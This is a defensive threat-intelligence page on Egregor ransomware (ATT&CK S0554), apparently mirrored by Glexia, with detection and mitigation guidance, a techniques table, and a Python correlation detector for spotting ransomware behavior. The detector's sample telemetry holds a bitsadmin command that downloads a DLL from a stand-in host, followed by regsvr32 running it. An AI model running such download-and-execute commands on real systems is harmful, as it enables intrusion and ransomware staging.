S0554: Egregor
Analyst context for executives and security teams
Egregor is a Windows ransomware-as-a-service tool documented by ATT&CK, with reported code similarities to Sekhmet and Maze. Its relationship set matters because it spans more than encryption: discovery of users, groups, systems, network connections, use of PowerShell/cmd and Windows utilities, remote access tooling, stealth techniques, network share collection, Group Policy modification, and data encryption for impact. For leaders, this is a reminder that ransomware readiness is not just backup quality; it depends on whether identity, endpoint, network, and Windows administration telemetry can show the path to impact before or during an incident.
Executive priority
Treat this object as a ransomware resilience validation case. Ask whether the organization can prove coverage for Windows execution, domain and user discovery, remote access tool use, Group Policy changes, suspicious BITS jobs, regsvr32/rundll32 abuse, process injection indicators, network share access, and early signs of mass encryption. Prioritize controls and evidence that reduce blast radius: privileged access governance, change control over GPOs, monitored administrative tooling, segmentation around shared drives, and tested recovery processes. Because ATT&CK provides no official detection text for Egregor, local validation and incident response playbooks should drive confidence rather than assumptions of tool-specific detection.
Technical view
SOC and IR teams should map Egregor-related coverage to the listed ATT&CK relationships: execution through PowerShell, Windows Command Shell, Native API, DLL abuse, Regsvr32, Rundll32, and BITS Jobs; discovery through system owner/user, domain groups, system information, network connections, and system time; stealth through packing, deobfuscation, masqueraded tasks/services, process injection, and sandbox/time checks; command-and-control or staging through web protocols, ingress tool transfer, and remote access tools; collection from network shared drives; privilege or defense impairment through Group Policy modification; and impact through data encryption. Since the base malware object lists Windows as the platform and no official detection is supplied, detections should be behavior-led and tested against benign administrative baselines.
Likely telemetry
- Windows endpoint process creation and command-line logging for PowerShell, cmd.exe, regsvr32.exe, rundll32.exe, and BITS-related activity
- PowerShell script block, module, and transcription logs where enabled
- Windows service, scheduled task, and task/service naming telemetry for masquerading review
- EDR telemetry for process injection, suspicious DLL loading, packed executables, and in-memory execution patterns
- Active Directory and domain controller logs for domain group enumeration and Group Policy Object modification
Detection direction
- Build behavior-based detections across the related techniques rather than relying on an Egregor-specific signature, because official ATT&CK detection guidance is not provided.
- Tune PowerShell, cmd.exe, regsvr32.exe, rundll32.exe, BITS, and DLL-loading detections against known administrative and software-management activity to reduce false positives.
- Correlate discovery behaviors with later tool transfer, remote access, network share access, GPO modification, or encryption activity; individual discovery commands may be benign, but clustering increases investigative value.
- Monitor GPO modifications as high-value events, especially changes affecting security controls, scripts, startup behavior, or domain-wide configuration.
- Validate visibility on network shared drives, since ransomware impact and data collection can occur through accessible shares rather than only local disks.
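One way to implement the clustering these bullets describe, as an added example that is not part of the ATT&CK entry or of Glexia's tooling: each raw event is mapped to a behavior stage (discovery, BITS transfer, regsvr32/rundll32 loading a DLL from a user-writable path, encoded PowerShell, Directory Service event 5136 on a groupPolicyContainer object, and a per-process burst of distinct file writes as an early mass-encryption signal), then stages are clustered per host inside a time window and a host is flagged only when the cluster spans several stages. The event dictionaries, field names, hosts, paths, window and thresholds are constructed for illustration and approximate Sysmon/Windows Security telemetry; they are assumptions, not a real parser or the page's data.

```python
"""Behavior-led correlation across the Egregor-related technique set.

Added example for this page; not ATT&CK content or Glexia tooling. Event
shapes, hosts, paths, window and thresholds are constructed assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=30)                 # per-host clustering window (assumed)
ENCRYPTION_FILE_THRESHOLD = 50                 # distinct files per process per window (assumed)
USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\temp\\", "\\appdata\\")
SEVERE_STAGES = {"gpo_modification", "encryption_burst"}


def classify(ev):
    """Map one raw event to a behavior stage name, or None if not of interest."""
    if ev["kind"] == "process":
        image = ev["image"].lower().rsplit("\\", 1)[-1]
        cmd = ev["cmdline"].lower()
        if image in ("whoami.exe", "nltest.exe", "systeminfo.exe"):
            return "discovery"
        if image == "net.exe" and (" group " in cmd or " user " in cmd):
            return "discovery"
        if image == "bitsadmin.exe" and "/transfer" in cmd:
            return "tool_transfer"
        if image in ("regsvr32.exe", "rundll32.exe") and any(p in cmd for p in USER_WRITABLE):
            return "lolbin_exec"
        if image == "powershell.exe" and " -enc" in cmd:
            return "encoded_powershell"
        return None
    # Security 5136 = Directory Service object modified; groupPolicyContainer means a GPO.
    if ev["kind"] == "security" and ev["event_id"] == 5136 \
            and ev.get("object_class") == "groupPolicyContainer":
        return "gpo_modification"
    return None


def encryption_bursts(events):
    """Return synthetic stage hits where one process wrote many distinct files inside WINDOW."""
    per_proc = defaultdict(list)
    for ev in events:
        if ev["kind"] == "file":
            per_proc[(ev["host"], ev["pid"])].append(ev)
    hits = []
    for (host, pid), evs in per_proc.items():
        evs.sort(key=lambda e: e["ts"])
        for i, start in enumerate(evs):
            paths = {e["path"] for e in evs[i:] if e["ts"] - start["ts"] <= WINDOW}
            if len(paths) >= ENCRYPTION_FILE_THRESHOLD:
                hits.append({"host": host, "ts": start["ts"], "stage": "encryption_burst",
                             "detail": f"pid {pid} wrote {len(paths)} distinct files in {WINDOW}"})
                break                          # one hit per process is enough
    return hits


def correlate(events, min_stages=3):
    """Cluster stage hits per host inside WINDOW; flag hosts whose cluster spans several stages."""
    hits = []
    for ev in events:
        stage = classify(ev)
        if stage:
            hits.append({"host": ev["host"], "ts": ev["ts"], "stage": stage,
                         "detail": ev.get("cmdline") or f"event {ev.get('event_id')}"})
    hits.extend(encryption_bursts(events))
    by_host = defaultdict(list)
    for h in hits:
        by_host[h["host"]].append(h)
    findings = []
    for host, hs in by_host.items():
        hs.sort(key=lambda h: h["ts"])
        best = None
        for i, anchor in enumerate(hs):                # best window = most distinct stages
            cluster = [h for h in hs[i:] if h["ts"] - anchor["ts"] <= WINDOW]
            stages = sorted({h["stage"] for h in cluster})
            if best is None or len(stages) > len(best["stages"]):
                best = {"host": host, "first_seen": anchor["ts"], "stages": stages,
                        "evidence": [h["detail"] for h in cluster]}
        # Discovery alone is routine; several stages, or two including a severe one, are not.
        distinct = len(best["stages"])
        if distinct >= min_stages or (distinct >= 2 and SEVERE_STAGES & set(best["stages"])):
            findings.append(best)
    return findings


def _ts(hhmm):
    return datetime(2020, 11, 1, int(hhmm[:2]), int(hhmm[3:]))


def _proc(host, t, image, cmdline):
    return {"kind": "process", "host": host, "ts": _ts(t), "image": image, "cmdline": cmdline}


# Constructed sample telemetry (hypothetical hosts, users and paths).
SAMPLE_EVENTS = [
    # ADMIN01: a routine domain-group lookup by an administrator, nothing follows it.
    _proc("ADMIN01", "09:00", r"C:\Windows\System32\net.exe", 'net group "Domain Admins" /domain'),
    _proc("ADMIN01", "09:30", r"C:\Windows\System32\systeminfo.exe", "systeminfo"),
    # DC01: an isolated GPO edit, the kind change control should account for.
    {"kind": "security", "host": "DC01", "ts": _ts("09:15"), "event_id": 5136,
     "object_class": "groupPolicyContainer"},
    # WS01: discovery, BITS transfer, regsvr32 of a DLL from ProgramData, GPO change, file burst.
    _proc("WS01", "10:00", r"C:\Windows\System32\whoami.exe", "whoami /all"),
    _proc("WS01", "10:01", r"C:\Windows\System32\net.exe", 'net group "Domain Admins" /domain'),
    _proc("WS01", "10:05", r"C:\Windows\System32\bitsadmin.exe",
          r"bitsadmin /transfer j1 http://example.invalid/setup.dll C:\ProgramData\setup.dll"),
    _proc("WS01", "10:06", r"C:\Windows\System32\regsvr32.exe", r"regsvr32 /s C:\ProgramData\setup.dll"),
    {"kind": "security", "host": "WS01", "ts": _ts("10:10"), "event_id": 5136,
     "object_class": "groupPolicyContainer"},
] + [{"kind": "file", "host": "WS01", "ts": _ts("10:12") + timedelta(seconds=i), "pid": 4321,
      "path": rf"\\FS01\finance\doc{i}.docx"} for i in range(60)]


if __name__ == "__main__":
    for f in correlate(SAMPLE_EVENTS):
        print(f["host"], f["first_seen"], f["stages"])
```

Run against the constructed records, only WS01 is flagged: ADMIN01's discovery commands and DC01's lone GPO edit each produce a single stage and stay below the threshold, which is the point of correlating rather than alerting on individual discovery commands. The stage matchers, window and file-burst threshold are the knobs to tune against the organization's own administrative baseline before the logic is trusted in production.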
Mitigation priorities
- Prioritize resilient recovery: tested backups, restoration procedures, and protection of backup infrastructure from domain-wide compromise.
- Harden identity and Windows administration paths: restrict privileged groups, monitor domain group changes, and enforce change control for Group Policy.
- Limit lateral reach to shared drives using least privilege, segmentation, and auditing of sensitive file repositories.
- Constrain and monitor scripting and living-off-the-land utilities such as PowerShell, cmd.exe, BITS, regsvr32.exe, and rundll32.exe according to business need.
- Govern legitimate remote access tools with approved inventories, authentication controls, logging, and exception review.
Analyst notes and limits
The object is a malware entry for Egregor, external ID S0554, in the enterprise ATT&CK domain, with Windows as the listed platform. ATT&CK describes it as Ransomware-as-a-Service first observed in September 2020 and cites NHS Digital, Cyble, and Security Boulevard reporting, including noted code similarities with Sekhmet and Maze. The most useful defensive value comes from the relationship context: Egregor is linked to execution, stealth, discovery, collection, command-and-control, privilege/defense impairment, and impact techniques.
ATT&CK provides no official detection text, no aliases, and no object-level tactics for this entry. The relationship techniques provide behavior context, but they do not prove activity in any specific environment or guarantee that a given control detects Egregor. Local telemetry availability, Windows logging configuration, EDR visibility, identity architecture, remote access tool inventory, and file share design are required to assess actual exposure and coverage.
Egregor
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1497.003 | Time Based Checks Sub-technique | Egregor can perform a long sleep (greater than or equal to 3 minutes) to evade detection. (Citation: JoeSecurity Egregor 2020) |
| Enterprise | T1218.011 | Rundll32 Sub-technique | Egregor has used rundll32 during execution. (Citation: Cybereason Egregor Nov 2020) |
| Enterprise | T1197 | BITS Jobs | Egregor has used BITSadmin to download and execute malicious DLLs. (Citation: Intrinsec Egregor Nov 2020) |
| Enterprise | T1124 | System Time Discovery | Egregor contains functionality to query the local/system time. (Citation: JoeSecurity Egregor 2020) |
| Enterprise | T1027.002 | Software Packing Sub-technique | Egregor's payloads are custom-packed, archived and encrypted to prevent analysis. (Citation: NHS Digital Egregor Nov 2020) (Citation: Cyble Egregor Oct 2020) |
| Enterprise | T1039 | Data from Network Shared Drive | Egregor can collect any files found in the enumerated drives before sending them to its C2 channel. (Citation: NHS Digital Egregor Nov 2020) |
| Enterprise | T1106 | Native API | Egregor has used the Windows API to make detection more difficult. (Citation: Cyble Egregor Oct 2020) |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | Egregor has been decrypted before execution. (Citation: NHS Digital Egregor Nov 2020) (Citation: Cybereason Egregor Nov 2020) |
| Enterprise | T1036.004 | Masquerade Task or Service Sub-technique | Egregor has masqueraded the svchost.exe process to exfiltrate data. (Citation: Intrinsec Egregor Nov 2020) |
| Enterprise | T1049 | System Network Connections Discovery | Egregor can enumerate all connected drives. (Citation: NHS Digital Egregor Nov 2020) |
| Enterprise | T1033 | System Owner/User Discovery | Egregor has used tools to gather information about users. (Citation: Intrinsec Egregor Nov 2020) |
| Enterprise | T1105 | Ingress Tool Transfer | Egregor has the ability to download files from its C2 server. (Citation: Cybereason Egregor Nov 2020) (Citation: Intrinsec Egregor Nov 2020) |
| Enterprise | T1685 | Disable or Modify Tools | Egregor has disabled Windows Defender to evade protections. (Citation: Intrinsec Egregor Nov 2020) |
| Enterprise | T1497 | Virtualization/Sandbox Evasion | Egregor has used multiple anti-analysis and anti-sandbox techniques to prevent automated analysis by sandboxes. (Citation: Cyble Egregor Oct 2020) (Citation: NHS Digital Egregor Nov 2020) |
| Enterprise | T1574.001 | DLL Sub-technique | Egregor has used DLL side-loading to execute its payload. (Citation: Cyble Egregor Oct 2020) |
| Enterprise | T1486 | Data Encrypted for Impact | Egregor can encrypt all non-system files using a hybrid AES-RSA algorithm prior to displaying a ransom note. (Citation: NHS Digital Egregor Nov 2020) (Citation: Cybereason Egregor Nov 2020) |
| Enterprise | T1069.002 | Domain Groups Sub-technique | |
| Enterprise | T1218.010 | Regsvr32 Sub-technique | Egregor has used regsvr32.exe to execute malicious DLLs. (Citation: JoeSecurity Egregor 2020) |
| Enterprise | T1071.001 | Web Protocols Sub-technique | Egregor has communicated with its C2 servers via the HTTPS protocol. (Citation: Intrinsec Egregor Nov 2020) |
| Enterprise | T1219 | Remote Access Tools | Egregor has checked for the LogMeIn event log in an attempt to encrypt files on remote machines. (Citation: Cyble Egregor Oct 2020) |
| Enterprise | T1059.003 | Windows Command Shell Sub-technique | Egregor has used batch files for execution and can launch Internet Explorer from cmd.exe. (Citation: JoeSecurity Egregor 2020) (Citation: Cybereason Egregor Nov 2020) |
| Enterprise | T1484.001 | Group Policy Modification Sub-technique | Egregor can modify the GPO to evade detection. (Citation: Cybereason Egregor Nov 2020) (Citation: Intrinsec Egregor Nov 2020) |
| Enterprise | T1055 | Process Injection | Egregor can inject its payload into the iexplore.exe process. (Citation: Cyble Egregor Oct 2020) |
| Enterprise | T1059.001 | PowerShell Sub-technique | Egregor has used an encoded PowerShell command by a service created by Cobalt Strike for lateral movement. (Citation: Intrinsec Egregor Nov 2020) |
| Enterprise | T1082 | System Information Discovery | Egregor can perform a language check of the infected system and can query the CPU information (cpuid). (Citation: JoeSecurity Egregor 2020) (Citation: NHS Digital Egregor Nov 2020) |
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources: Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.0 | | Current bundle | 17d0e143e52e… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
[1] NHS Digital Egregor Nov 2020: NHS Digital. (2020, November 26). Egregor Ransomware The RaaS successor to Maze. Retrieved December 29, 2020.
[2] Cyble Egregor Oct 2020: Cybleinc. (2020, October 31). Egregor Ransomware – A Deep Dive Into Its Activities and Techniques. Retrieved December 29, 2020.
[3] Security Boulevard Egregor Oct 2020: Meskauskas, T. (2020, October 29). Egregor: Sekhmet’s Cousin. Retrieved January 6, 2021.
[4] Egregor (object description): (Citation: NHS Digital Egregor Nov 2020)(Citation: Cyble Egregor Oct 2020)
[5] mitre-attack S0554 (ATT&CK source record)
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.